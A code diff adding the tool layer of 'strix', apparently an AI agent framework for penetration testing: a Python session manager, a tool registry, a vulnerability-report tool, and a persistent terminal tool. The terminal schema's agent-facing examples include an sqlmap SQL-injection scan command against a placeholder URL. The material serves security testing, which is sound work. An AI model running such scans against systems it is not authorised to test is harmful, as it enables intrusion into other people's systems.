            result_repr = repr(execution_result.result)
            result_repr = self._truncate_output(
                result_repr, MAX_STDOUT_LENGTH, "... [result truncated at 10k chars]"
            )
            stdout += result_repr
        stdout = self._truncate_output(
            stdout, MAX_STDOUT_LENGTH, "... [output truncated at 10k chars]"
        )
        stderr_content = stderr_content if stderr_content else ""
        stderr_content = self._truncate_output(
            stderr_content, MAX_STDERR_LENGTH, "... [stderr truncated at 5k chars]"
        )
        if (
            execution_result.error_before_exec or execution_result.error_in_exec
        ) and not stderr_content:
            stderr_content = "Execution error occurred"
        return {
            "session_id": self.session_id,
            "stdout": stdout,
            "stderr": stderr_content,
            "result": repr(execution_result.result)
            if execution_result.result is not None
            else None,
        }
    def _handle_execution_error(self, error: BaseException) -> dict[str, Any]:
        error_msg = str(error)
        error_msg = self._truncate_output(
            error_msg, MAX_STDERR_LENGTH, "... [error truncated at 5k chars]"
        )
        return {
            "session_id": self.session_id,
            "stdout": "",
            "stderr": error_msg,
            "result": None,
        }
    def execute_code(self, code: str, timeout: int = 30) -> dict[str, Any]:
        session_error = self._validate_session()
        if session_error:
            return session_error
        with self._execution_lock:
            old_stdout, old_stderr = sys.stdout, sys.stderr
            try:
                old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
                    timeout
                )
                try:
                    execution_result = self.shell.run_cell(code, silent=False, store_history=True)
                    signal.alarm(0)
                    return self._format_execution_result(
                        execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
                    )
                except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
                    signal.alarm(0)
                    return self._handle_execution_error(e)
            finally:
                self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
    def close(self) -> None:
        self.is_running = False
        self.shell.reset(new_session=False)
    def is_alive(self) -> bool:
        return self.is_running
--- a/strix/tools/python/python_manager.py
+++ b/strix/tools/python/python_manager.py
@@ -0,0 +1,131 @@
 import atexit
 import contextlib
 import signal
 import sys
 import threading
 from typing import Any
 from .python_instance import PythonInstance
 class PythonSessionManager:
    def __init__(self) -> None:
        self.sessions: dict[str, PythonInstance] = {}
        self._lock = threading.Lock()
        self.default_session_id = "default"
        self._register_cleanup_handlers()
    def create_session(
        self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
    ) -> dict[str, Any]:
        if session_id is None:
            session_id = self.default_session_id
        with self._lock:
            if session_id in self.sessions:
                raise ValueError(f"Python session '{session_id}' already exists")
            session = PythonInstance(session_id)
            self.sessions[session_id] = session
            if initial_code:
                result = session.execute_code(initial_code, timeout)
                result["message"] = (
                    f"Python session '{session_id}' created successfully with initial code"
                )
            else:
                result = {
                    "session_id": session_id,
                    "message": f"Python session '{session_id}' created successfully",
                }
            return result
    def execute_code(
        self, session_id: str | None = None, code: str | None = None, timeout: int = 30
    ) -> dict[str, Any]:
        if session_id is None:
            session_id = self.default_session_id
        if not code:
            raise ValueError("No code provided for execution")
        with self._lock:
            if session_id not in self.sessions:
                raise ValueError(f"Python session '{session_id}' not found")
            session = self.sessions[session_id]
        result = session.execute_code(code, timeout)
        result["message"] = f"Code executed in session '{session_id}'"
        return result
    def close_session(self, session_id: str | None = None) -> dict[str, Any]:
        if session_id is None:
            session_id = self.default_session_id
        with self._lock:
            if session_id not in self.sessions:
                raise ValueError(f"Python session '{session_id}' not found")
            session = self.sessions.pop(session_id)
        session.close()
        return {
            "session_id": session_id,
            "message": f"Python session '{session_id}' closed successfully",
            "is_running": False,
        }
    def list_sessions(self) -> dict[str, Any]:
        with self._lock:
            session_info = {}
            for sid, session in self.sessions.items():
                session_info[sid] = {
                    "is_running": session.is_running,
                    "is_alive": session.is_alive(),
                }
        return {"sessions": session_info, "total_count": len(session_info)}
    def cleanup_dead_sessions(self) -> None:
        with self._lock:
            dead_sessions = []
            for sid, session in self.sessions.items():
                if not session.is_alive():
                    dead_sessions.append(sid)
            for sid in dead_sessions:
                session = self.sessions.pop(sid)
                with contextlib.suppress(Exception):
                    session.close()
    def close_all_sessions(self) -> None:
        with self._lock:
            sessions_to_close = list(self.sessions.values())
            self.sessions.clear()
        for session in sessions_to_close:
            with contextlib.suppress(Exception):
                session.close()
    def _register_cleanup_handlers(self) -> None:
        atexit.register(self.close_all_sessions)
        signal.signal(signal.SIGTERM, self._signal_handler)
        signal.signal(signal.SIGINT, self._signal_handler)
        if hasattr(signal, "SIGHUP"):
            signal.signal(signal.SIGHUP, self._signal_handler)
    def _signal_handler(self, _signum: int, _frame: Any) -> None:
        self.close_all_sessions()
        sys.exit(0)
 _python_session_manager = PythonSessionManager()
 def get_python_session_manager() -> PythonSessionManager:
    return _python_session_manager
--- a/strix/tools/registry.py
+++ b/strix/tools/registry.py
@@ -0,0 +1,196 @@
 import inspect
 import logging
 import os
 from collections.abc import Callable
 from functools import wraps
 from inspect import signature
 from pathlib import Path
 from typing import Any
 tools: list[dict[str, Any]] = []
 _tools_by_name: dict[str, Callable[..., Any]] = {}
 logger = logging.getLogger(__name__)
 class ImplementedInClientSideOnlyError(Exception):
    def __init__(
        self,
        message: str = "This tool is implemented in the client side only",
    ) -> None:
        self.message = message
        super().__init__(self.message)
 def _process_dynamic_content(content: str) -> str:
    if "{{DYNAMIC_MODULES_DESCRIPTION}}" in content:
        try:
            from strix.prompts import generate_modules_description
            modules_description = generate_modules_description()
            content = content.replace("{{DYNAMIC_MODULES_DESCRIPTION}}", modules_description)
        except ImportError:
            logger.warning("Could not import prompts utilities for dynamic schema generation")
            content = content.replace(
                "{{DYNAMIC_MODULES_DESCRIPTION}}",
                "List of prompt modules to load for this agent (max 3). Module discovery failed.",
            )
    return content
 def _load_xml_schema(path: Path) -> Any:
    if not path.exists():
        return None
    try:
        content = path.read_text()
        content = _process_dynamic_content(content)
        start_tag = '<tool name="'
        end_tag = "</tool>"
        tools_dict = {}
        pos = 0
        while True:
            start_pos = content.find(start_tag, pos)
            if start_pos == -1:
                break
            name_start = start_pos + len(start_tag)
            name_end = content.find('"', name_start)
            if name_end == -1:
                break
            tool_name = content[name_start:name_end]
            end_pos = content.find(end_tag, name_end)
            if end_pos == -1:
                break
            end_pos += len(end_tag)
            tool_element = content[start_pos:end_pos]
            tools_dict[tool_name] = tool_element
            pos = end_pos
            if pos >= len(content):
                break
    except (IndexError, ValueError, UnicodeError) as e:
        logger.warning(f"Error loading schema file {path}: {e}")
        return None
    else:
        return tools_dict
 def _get_module_name(func: Callable[..., Any]) -> str:
    module = inspect.getmodule(func)
    if not module:
        return "unknown"
    module_name = module.__name__
    if ".tools." in module_name:
        parts = module_name.split(".tools.")[-1].split(".")
        if len(parts) >= 1:
            return parts[0]
    return "unknown"
 def register_tool(
    func: Callable[..., Any] | None = None, *, sandbox_execution: bool = True
 ) -> Callable[..., Any]:
    def decorator(f: Callable[..., Any]) -> Callable[..., Any]:
        func_dict = {
            "name": f.__name__,
            "function": f,
            "module": _get_module_name(f),
            "sandbox_execution": sandbox_execution,
        }
        sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
        if not sandbox_mode:
            try:
                module_path = Path(inspect.getfile(f))
                schema_file_name = f"{module_path.stem}_schema.xml"
                schema_path = module_path.parent / schema_file_name
                xml_tools = _load_xml_schema(schema_path)
                if xml_tools is not None and f.__name__ in xml_tools:
                    func_dict["xml_schema"] = xml_tools[f.__name__]
                else:
                    func_dict["xml_schema"] = (
                        f'<tool name="{f.__name__}">'
                        "<description>Schema not found for tool.</description>"
                        "</tool>"
                    )
            except (TypeError, FileNotFoundError) as e:
                logger.warning(f"Error loading schema for {f.__name__}: {e}")
                func_dict["xml_schema"] = (
                    f'<tool name="{f.__name__}">'
                    "<description>Error loading schema.</description>"
                    "</tool>"
                )
        tools.append(func_dict)
        _tools_by_name[str(func_dict["name"])] = f
        @wraps(f)
        def wrapper(*args: Any, **kwargs: Any) -> Any:
            return f(*args, **kwargs)
        return wrapper
    if func is None:
        return decorator
    return decorator(func)
 def get_tool_by_name(name: str) -> Callable[..., Any] | None:
    return _tools_by_name.get(name)
 def get_tool_names() -> list[str]:
    return list(_tools_by_name.keys())
 def needs_agent_state(tool_name: str) -> bool:
    tool_func = get_tool_by_name(tool_name)
    if not tool_func:
        return False
    sig = signature(tool_func)
    return "agent_state" in sig.parameters
 def should_execute_in_sandbox(tool_name: str) -> bool:
    for tool in tools:
        if tool.get("name") == tool_name:
            return bool(tool.get("sandbox_execution", True))
    return True
 def get_tools_prompt() -> str:
    tools_by_module: dict[str, list[dict[str, Any]]] = {}
    for tool in tools:
        module = tool.get("module", "unknown")
        if module not in tools_by_module:
            tools_by_module[module] = []
        tools_by_module[module].append(tool)
    xml_sections = []
    for module, module_tools in sorted(tools_by_module.items()):
        tag_name = f"{module}_tools"
        section_parts = [f"<{tag_name}>"]
        for tool in module_tools:
            tool_xml = tool.get("xml_schema", "")
            if tool_xml:
                indented_tool = "\n".join(f"  {line}" for line in tool_xml.split("\n"))
                section_parts.append(indented_tool)
        section_parts.append(f"</{tag_name}>")
        xml_sections.append("\n".join(section_parts))
    return "\n\n".join(xml_sections)
 def clear_registry() -> None:
    tools.clear()
    _tools_by_name.clear()
--- a/strix/tools/reporting/init.py
+++ b/strix/tools/reporting/init.py
@@ -0,0 +1,6 @@
 from .reporting_actions import create_vulnerability_report
 __all__ = [
    "create_vulnerability_report",
 ]
--- a/strix/tools/reporting/reporting_actions.py
+++ b/strix/tools/reporting/reporting_actions.py
@@ -0,0 +1,63 @@
 from typing import Any
 from strix.tools.registry import register_tool
@register_tool(sandbox_execution=False)
 def create_vulnerability_report(
    title: str,
    content: str,
    severity: str,
 ) -> dict[str, Any]:
    validation_error = None
    if not title or not title.strip():
        validation_error = "Title cannot be empty"
    elif not content or not content.strip():
        validation_error = "Content cannot be empty"
    elif not severity or not severity.strip():
        validation_error = "Severity cannot be empty"
    else:
        valid_severities = ["critical", "high", "medium", "low", "info"]
        if severity.lower() not in valid_severities:
            validation_error = (
                f"Invalid severity '{severity}'. Must be one of: {', '.join(valid_severities)}"
            )
    if validation_error:
        return {"success": False, "message": validation_error}
    try:
        from strix.cli.tracer import get_global_tracer
        tracer = get_global_tracer()
        if tracer:
            report_id = tracer.add_vulnerability_report(
                title=title,
                content=content,
                severity=severity,
            )
            return {
                "success": True,
                "message": f"Vulnerability report '{title}' created successfully",
                "report_id": report_id,
                "severity": severity.lower(),
            }
        import logging
        logging.warning("Global tracer not available - vulnerability report not stored")
        return {  # noqa: TRY300
            "success": True,
            "message": f"Vulnerability report '{title}' created successfully (not persisted)",
            "warning": "Report could not be persisted - tracer unavailable",
        }
    except ImportError:
        return {
            "success": True,
            "message": f"Vulnerability report '{title}' created successfully (not persisted)",
            "warning": "Report could not be persisted - tracer module unavailable",
        }
    except (ValueError, TypeError) as e:
        return {"success": False, "message": f"Failed to create vulnerability report: {e!s}"}
--- a/strix/tools/reporting/reporting_actions_schema.xml
+++ b/strix/tools/reporting/reporting_actions_schema.xml
@@ -0,0 +1,30 @@
 <tools>
  <tool name="create_vulnerability_report">
    <description>Create a vulnerability report for a discovered security issue.
 Use this tool to document a specific verified security vulnerability.
 Put ALL details in the content field - affected URLs, parameters, proof of concept, remediation steps, CVE references, CVSS scores, technical details, impact assessment, etc.
 DO NOT USE:
 - For general security observations without specific vulnerabilities
 - When you don't have concrete vulnerability details
 - When you don't have a proof of concept, or still not 100% sure if it's a vulnerability
 - For tracking multiple vulnerabilities (create separate reports)
 - For reporting multiple vulnerabilities at once. Use a separate create_vulnerability_report for each vulnerability.
 </description>
    <parameters>
      <parameter name="title" type="string" required="true">
        <description>Clear, concise title of the vulnerability</description>
      </parameter>
      <parameter name="content" type="string" required="true">
        <description>Complete vulnerability details including affected URLs, technical details, impact, proof of concept, remediation steps, and any relevant references. Be comprehensive and include everything relevant.</description>
      </parameter>
      <parameter name="severity" type="string" required="true">
        <description>Severity level: critical, high, medium, low, or info</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing success status and message</description>
    </returns>
  </tool>
 </tools>
--- a/strix/tools/terminal/init.py
+++ b/strix/tools/terminal/init.py
@@ -0,0 +1,4 @@
 from .terminal_actions import terminal_action
 __all__ = ["terminal_action"]
--- a/strix/tools/terminal/terminal_actions.py
+++ b/strix/tools/terminal/terminal_actions.py
@@ -0,0 +1,53 @@
 from typing import Any, Literal
 from strix.tools.registry import register_tool
 from .terminal_manager import get_terminal_manager
 TerminalAction = Literal["new_terminal", "send_input", "wait", "close"]
@register_tool
 def terminal_action(
    action: TerminalAction,
    inputs: list[str] | None = None,
    time: float | None = None,
    terminal_id: str | None = None,
 ) -> dict[str, Any]:
    def _validate_inputs(action_name: str, inputs: list[str] | None) -> None:
        if not inputs:
            raise ValueError(f"inputs parameter is required for {action_name} action")
    def _validate_time(time_param: float | None) -> None:
        if time_param is None:
            raise ValueError("time parameter is required for wait action")
    def _validate_action(action_name: str) -> None:
        raise ValueError(f"Unknown action: {action_name}")
    manager = get_terminal_manager()
    try:
        match action:
            case "new_terminal":
                return manager.create_terminal(terminal_id, inputs)
            case "send_input":
                _validate_inputs(action, inputs)
                assert inputs is not None
                return manager.send_input(terminal_id, inputs)
            case "wait":
                _validate_time(time)
                assert time is not None
                return manager.wait_terminal(terminal_id, time)
            case "close":
                return manager.close_terminal(terminal_id)
            case _:
                _validate_action(action)  # type: ignore[unreachable]
    except (ValueError, RuntimeError) as e:
        return {"error": str(e), "terminal_id": terminal_id, "snapshot": "", "is_running": False}
--- a/strix/tools/terminal/terminal_actions_schema.xml
+++ b/strix/tools/terminal/terminal_actions_schema.xml
@@ -0,0 +1,114 @@
 <tools>
  <tool name="terminal_action">
    <description>Perform terminal actions using a terminal emulator instance. Each terminal instance
  is PERSISTENT and remains active until explicitly closed, allowing for multi-step
  workflows and long-running processes.</description>
    <parameters>
      <parameter name="action" type="string" required="true">
        <description>The terminal action to perform: - new_terminal: Create a new terminal instance. This MUST be the first action   for each terminal tab. - send_input: Send keyboard input to the specified terminal. - wait: Pause execution for specified number of seconds. Can be also used to get   the current terminal state (screenshot, output, etc.) after using other tools. - close: Close the specified terminal instance. This MUST be the final action   for each terminal tab.</description>
      </parameter>
      <parameter name="inputs" type="string" required="false">
        <description>Required for 'new_terminal' and 'send_input' actions: - List of inputs to send to terminal.   Each element in the list MUST be one of the following:   - Regular text: "hello", "world", etc.   - Literal text (not interpreted as special keys): prefix with "literal:"     e.g., "literal:Home", "literal:Escape", "literal:Enter" to send these as text   - Enter   - Space   - Backspace   - Escape: "Escape", "^[", "C-["   - Tab: "Tab"   - Arrow keys: "Left", "Right", "Up", "Down"   - Navigation: "Home", "End", "PageUp", "PageDown"   - Function keys: "F1" through "F12"   Modifier keys supported with prefixes:   - ^ or C- : Control (e.g., "^c", "C-c")   - S- : Shift (e.g., "S-F6")   - A- : Alt (e.g., "A-Home")   - Combined modifiers for arrows: "S-A-Up", "C-S-Left"   - Inputs MUST in all cases be sent as a LIST of strings, even if you are only     sending one input.   - Sending Inputs as a single string will NOT work.</description>
      </parameter>
      <parameter name="time" type="string" required="false">
        <description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
      </parameter>
      <parameter name="terminal_id" type="string" required="false">
        <description>Identifier for the terminal instance. Required for all actions except the first 'new_terminal' action. Allows managing multiple concurrent terminal tabs. - For 'new_terminal': if not provided, a default terminal is created. If provided,   creates a new terminal with that ID. - For other actions: specifies which terminal instance to operate on. - Default terminal ID is "default" if not specified.</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - snapshot: raw representation of current terminal state where you can see the   output of the command - terminal_id: the ID of the terminal instance that was operated on</description>
    </returns>
    <notes>
  Important usage rules:
  1. PERSISTENCE: Terminal instances remain active and maintain their state (environment
     variables, current directory, running processes) until explicitly closed with the
     'close' action. This allows for multi-step workflows across multiple tool calls.
  2. MULTIPLE TERMINALS: You can run multiple terminal instances concurrently by using
     different terminal_id values. Each terminal operates independently.
  3. Terminal interaction MUST begin with 'new_terminal' action for each terminal instance.
  4. Only one action can be performed per call.
  5. Input handling:
     - Regular text is sent as-is
     - Literal text: prefix with "literal:" to send special key names as literal text
     - Special keys must match supported key names
     - Modifier combinations follow specific syntax
     - Control can be specified as ^ or C- prefix
     - Shift (S-) works with special keys only
     - Alt (A-) works with any character/key
  6. Wait action:
      - Time is specified in seconds
      - Can be used to wait for command completion
      - Can be fractional (e.g., 0.5 seconds)
      - Snapshot and output are captured after the wait
      - You should estimate the time it will take to run the command and set the wait time accordingly.
      - It can be from a few seconds to a few minutes, choose wisely depending on the command you are running and the task.
  7. The terminal can operate concurrently with other tools. You may invoke
     browser, proxy, or other tools (in separate assistant messages) while maintaining
     active terminal sessions.
  8. You do not need to close terminals after you are done, but you can if you want to
     free up resources.
  9. You MUST end the inputs list with an "Enter" if you want to run the command, as
     it is not sent automatically.
  10. AUTOMATIC SPACING BEHAVIOR:
      - Consecutive regular text inputs have spaces automatically added between them
      - This is helpful for shell commands: ["ls", "-la"] becomes "ls -la"
      - This causes problems for compound commands: [":", "w", "q"] becomes ": w q"
      - Use "literal:" prefix to bypass spacing: [":", "literal:wq"] becomes ":wq"
      - Special keys (Enter, Space, etc.) and literal strings never trigger spacing
  11. WHEN TO USE LITERAL PREFIX:
      - Vim commands: [":", "literal:wq", "Enter"] instead of [":", "w", "q", "Enter"]
      - Any sequence where exact character positioning matters
      - When you need multiple characters sent as a single unit
  12. Do NOT use terminal actions for file editing or writing. Use the replace_in_file,
      write_to_file, or read_file tools instead.
    </notes>
    <examples>
  # Create new terminal with Node.js (default terminal)
  <function=terminal_action>
  <parameter=action>new_terminal</parameter>
  <parameter=inputs>["node", "Enter"]</parameter>
  </function>
  # Create a second (parallel) terminal instance for Python
  <function=terminal_action>
  <parameter=action>new_terminal</parameter>
  <parameter=terminal_id>python_terminal</parameter>
  <parameter=inputs>["python3", "Enter"]</parameter>
  </function>
  # Send command to the default terminal
  <function=terminal_action>
  <parameter=action>send_input</parameter>
  <parameter=inputs>["require('crypto').randomBytes(1000000).toString('hex')",
                     "Enter"]</parameter>
  </function>
  # Wait for previous action on default terminal
  <function=terminal_action>
  <parameter=action>wait</parameter>
  <parameter=time>2.0</parameter>
  </function>
  # Send multiple inputs with special keys to current terminal
  <function=terminal_action>
  <parameter=action>send_input</parameter>
  <parameter=inputs>["sqlmap -u 'http://example.com/page.php?id=1' --batch", "Enter", "y",
               "Enter", "n", "Enter", "n", "Enter"]</parameter>
  </function>
  # WRONG: Vim command with automatic spacing (becomes ": w q")
  <function=terminal_action>
  <parameter=action>send_input</parameter>
  <parameter=inputs>[":", "w", "q", "Enter"]</parameter>
  </function>
  # CORRECT: Vim command using literal prefix (becomes ":wq")
  <function=terminal_action>
  <parameter=action>send_input</parameter>
  <parameter=inputs>[":", "literal:wq", "Enter"]</parameter>
  </function>
    </examples>
  </tool>
 </tools>
--- a/strix/tools/terminal/terminal_instance.py
+++ b/strix/tools/terminal/terminal_instance.py
@@ -0,0 +1,231 @@
 import contextlib
 import os
 import pty
 import select
 import signal
 import subprocess
 import threading
 import time
 from typing import Any
 import pyte
 MAX_TERMINAL_SNAPSHOT_LENGTH = 10_000
 class TerminalInstance:
    def __init__(self, terminal_id: str, initial_command: str | None = None) -> None:
        self.terminal_id = terminal_id
        self.process: subprocess.Popen[bytes] | None = None
        self.master_fd: int | None = None
        self.is_running = False
        self._output_lock = threading.Lock()
        self._reader_thread: threading.Thread | None = None
        self.screen = pyte.HistoryScreen(80, 24, history=1000)
        self.stream = pyte.ByteStream()
        self.stream.attach(self.screen)
        self._start_terminal(initial_command)
    def _start_terminal(self, initial_command: str | None = None) -> None:
        try:
            self.master_fd, slave_fd = pty.openpty()
            shell = "/bin/bash"
            self.process = subprocess.Popen(  # noqa: S603
                [shell, "-i"],
                stdin=slave_fd,
                stdout=slave_fd,
                stderr=slave_fd,
                cwd="/workspace",
                preexec_fn=os.setsid,  # noqa: PLW1509 - Required for PTY functionality
            )
            os.close(slave_fd)
            self.is_running = True
            self._reader_thread = threading.Thread(target=self._read_output, daemon=True)
            self._reader_thread.start()
            time.sleep(0.5)
            if initial_command:
                self._write_to_terminal(initial_command)
        except (OSError, ValueError) as e:
            raise RuntimeError(f"Failed to start terminal: {e}") from e
    def _read_output(self) -> None:
        while self.is_running and self.master_fd:
            try:
                ready, _, _ = select.select([self.master_fd], [], [], 0.1)
                if ready:
                    data = os.read(self.master_fd, 4096)
                    if data:
                        with self._output_lock, contextlib.suppress(TypeError):
                            self.stream.feed(data)
                    else:
                        break
            except (OSError, ValueError):
                break
    def _write_to_terminal(self, data: str) -> None:
        if self.master_fd and self.is_running:
            try:
                os.write(self.master_fd, data.encode("utf-8"))
            except (OSError, ValueError) as e:
                raise RuntimeError("Terminal is no longer available") from e
    def send_input(self, inputs: list[str]) -> None:
        if not self.is_running:
            raise RuntimeError("Terminal is not running")
        for i, input_item in enumerate(inputs):
            if input_item.startswith("literal:"):
                literal_text = input_item[8:]
                self._write_to_terminal(literal_text)
            else:
                key_sequence = self._get_key_sequence(input_item)
                if key_sequence:
                    self._write_to_terminal(key_sequence)
                else:
                    self._write_to_terminal(input_item)
            time.sleep(0.05)
            if (
                i < len(inputs) - 1
                and not input_item.startswith("literal:")
                and not self._is_special_key(input_item)
                and not inputs[i + 1].startswith("literal:")
                and not self._is_special_key(inputs[i + 1])
            ):
                self._write_to_terminal(" ")
    def get_snapshot(self) -> dict[str, Any]:
        with self._output_lock:
            history_lines = [
                "".join(char.data for char in line_dict.values())
                for line_dict in self.screen.history.top
            ]
            current_lines = self.screen.display
            all_lines = history_lines + current_lines
            rendered_output = "\n".join(all_lines)
            if len(rendered_output) > MAX_TERMINAL_SNAPSHOT_LENGTH:
                rendered_output = rendered_output[-MAX_TERMINAL_SNAPSHOT_LENGTH:]
                truncated = True
            else:
                truncated = False
        return {
            "terminal_id": self.terminal_id,
            "snapshot": rendered_output,
            "is_running": self.is_running,
            "process_id": self.process.pid if self.process else None,
            "truncated": truncated,
        }
    def wait(self, duration: float) -> dict[str, Any]:
        time.sleep(duration)
        return self.get_snapshot()
    def close(self) -> None:
        self.is_running = False
        if self.process:
            with contextlib.suppress(OSError, ProcessLookupError):
                os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
                try:
                    self.process.wait(timeout=2)
                except subprocess.TimeoutExpired:
                    os.killpg(os.getpgid(self.process.pid), signal.SIGKILL)
                    self.process.wait()
        if self.master_fd:
            with contextlib.suppress(OSError):
                os.close(self.master_fd)
            self.master_fd = None
        if self._reader_thread and self._reader_thread.is_alive():
            self._reader_thread.join(timeout=1)
    def _is_special_key(self, key: str) -> bool:
        special_keys = {
            "Enter",
            "Space",
            "Backspace",
            "Tab",
            "Escape",
            "Up",
            "Down",
            "Left",
            "Right",
            "Home",
            "End",
            "PageUp",
            "PageDown",
            "Insert",
            "Delete",
        } | {f"F{i}" for i in range(1, 13)}
        if key in special_keys:
            return True
        return bool(key.startswith(("^", "C-", "S-", "A-")))
    def _get_key_sequence(self, key: str) -> str | None:
        key_map = {
            "Enter": "\r",
            "Space": " ",
            "Backspace": "\x08",
            "Tab": "\t",
            "Escape": "\x1b",
            "Up": "\x1b[A",
            "Down": "\x1b[B",
            "Right": "\x1b[C",
            "Left": "\x1b[D",
            "Home": "\x1b[H",
            "End": "\x1b[F",
            "PageUp": "\x1b[5~",
            "PageDown": "\x1b[6~",
            "Insert": "\x1b[2~",
            "Delete": "\x1b[3~",
            "F1": "\x1b[11~",
            "F2": "\x1b[12~",
            "F3": "\x1b[13~",
            "F4": "\x1b[14~",
            "F5": "\x1b[15~",
            "F6": "\x1b[17~",
            "F7": "\x1b[18~",
            "F8": "\x1b[19~",
            "F9": "\x1b[20~",
            "F10": "\x1b[21~",
            "F11": "\x1b[23~",
            "F12": "\x1b[24~",
        }
        if key in key_map:
            return key_map[key]
        if key.startswith("^") and len(key) == 2:
            char = key[1].lower()
            return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
        if key.startswith("C-") and len(key) == 3:
            char = key[2].lower()
            return chr(ord(char) - ord("a") + 1) if "a" <= char <= "z" else None
        return None
    def is_alive(self) -> bool:
        if not self.process:
            return False
        return self.process.poll() is None
--- a/strix/tools/terminal/terminal_manager.py
+++ b/strix/tools/terminal/terminal_manager.py
@@ -0,0 +1,191 @@
 import atexit
 import contextlib
 import signal
 import sys
 import threading
 from typing import Any
 from .terminal_instance import TerminalInstance
 class TerminalManager:
    def __init__(self) -> None:
        self.terminals: dict[str, TerminalInstance] = {}
        self._lock = threading.Lock()
        self.default_terminal_id = "default"
        self._register_cleanup_handlers()
    def create_terminal(
        self, terminal_id: str | None = None, inputs: list[str] | None = None
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' already exists")
            initial_command = None
            if inputs:
                command_parts: list[str] = []
                for input_item in inputs:
                    if input_item == "Enter":
                        initial_command = " ".join(command_parts) + "\n"
                        break
                    if input_item.startswith("literal:"):
                        command_parts.append(input_item[8:])
                    elif input_item not in [
                        "Space",
                        "Tab",
                        "Backspace",
                    ]:
                        command_parts.append(input_item)
            try:
                terminal = TerminalInstance(terminal_id, initial_command)
                self.terminals[terminal_id] = terminal
                if inputs and not initial_command:
                    terminal.send_input(inputs)
                    result = terminal.wait(2.0)
                else:
                    result = terminal.wait(1.0)
                result["message"] = f"Terminal '{terminal_id}' created successfully"
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to create terminal '{terminal_id}': {e}") from e
            else:
                return result
    def send_input(
        self, terminal_id: str | None = None, inputs: list[str] | None = None
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        if not inputs:
            raise ValueError("No inputs provided")
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
        try:
            terminal.send_input(inputs)
            result = terminal.wait(2.0)
            result["message"] = f"Input sent to terminal '{terminal_id}'"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to send input to terminal '{terminal_id}': {e}") from e
        else:
            return result
    def wait_terminal(
        self, terminal_id: str | None = None, duration: float = 1.0
    ) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
        try:
            result = terminal.wait(duration)
            result["message"] = f"Waited {duration}s on terminal '{terminal_id}'"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to wait on terminal '{terminal_id}': {e}") from e
        else:
            return result
    def close_terminal(self, terminal_id: str | None = None) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals.pop(terminal_id)
        try:
            terminal.close()
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to close terminal '{terminal_id}': {e}") from e
        else:
            return {
                "terminal_id": terminal_id,
                "message": f"Terminal '{terminal_id}' closed successfully",
                "snapshot": "",
                "is_running": False,
            }
    def get_terminal_snapshot(self, terminal_id: str | None = None) -> dict[str, Any]:
        if terminal_id is None:
            terminal_id = self.default_terminal_id
        with self._lock:
            if terminal_id not in self.terminals:
                raise ValueError(f"Terminal '{terminal_id}' not found")
            terminal = self.terminals[terminal_id]
        return terminal.get_snapshot()
    def list_terminals(self) -> dict[str, Any]:
        with self._lock:
            terminal_info = {}
            for tid, terminal in self.terminals.items():
                terminal_info[tid] = {
                    "is_running": terminal.is_running,
                    "is_alive": terminal.is_alive(),
                    "process_id": terminal.process.pid if terminal.process else None,
                }
        return {"terminals": terminal_info, "total_count": len(terminal_info)}
    def cleanup_dead_terminals(self) -> None:
        with self._lock:
            dead_terminals = []
            for tid, terminal in self.terminals.items():
                if not terminal.is_alive():
                    dead_terminals.append(tid)
            for tid in dead_terminals:
                terminal = self.terminals.pop(tid)
                with contextlib.suppress(Exception):
                    terminal.close()
    def close_all_terminals(self) -> None:
        with self._lock:
            terminals_to_close = list(self.terminals.values())
            self.terminals.clear()
        for terminal in terminals_to_close:
            with contextlib.suppress(Exception):
                terminal.close()
    def _register_cleanup_handlers(self) -> None:
        atexit.register(self.close_all_terminals)
        signal.signal(signal.SIGTERM, self._signal_handler)
        signal.signal(signal.SIGINT, self._signal_handler)
        if hasattr(signal, "SIGHUP"):
            signal.signal(signal.SIGHUP, self._signal_handler)
    def _signal_handler(self, _signum: int, _frame: Any) -> None:
        self.close_all_terminals()
        sys.exit(0)
 _terminal_manager = TerminalManager()
 def get_terminal_manager() -> TerminalManager:
    return _terminal_manager
--- a/strix/tools/thinking/init.py
+++ b/strix/tools/thinking/init.py
@@ -0,0 +1,4 @@
 from .thinking_actions import think
 __all__ = ["think"]
--- a/Show More
+++ b/Show More
		`@@ -0,0 +1,4 @@`
							`from .strix_agent import StrixAgent`


							`__all__ = ["StrixAgent"]`
		`@@ -0,0 +1,4 @@`
							`from .main import main`


							`__all__ = ["main"]`
		`@@ -0,0 +1,4 @@`
							`from .browser_actions import browser_action`


							`__all__ = ["browser_action"]`
		`@@ -0,0 +1,4 @@`
							`from .file_edit_actions import list_files, search_files, str_replace_editor`


							`__all__ = ["list_files", "search_files", "str_replace_editor"]`
		`@@ -0,0 +1,4 @@`
							`from .finish_actions import finish_scan`


							`__all__ = ["finish_scan"]`
		`@@ -0,0 +1,4 @@`
							`from .python_actions import python_action`


							`__all__ = ["python_action"]`
		`@@ -0,0 +1,4 @@`
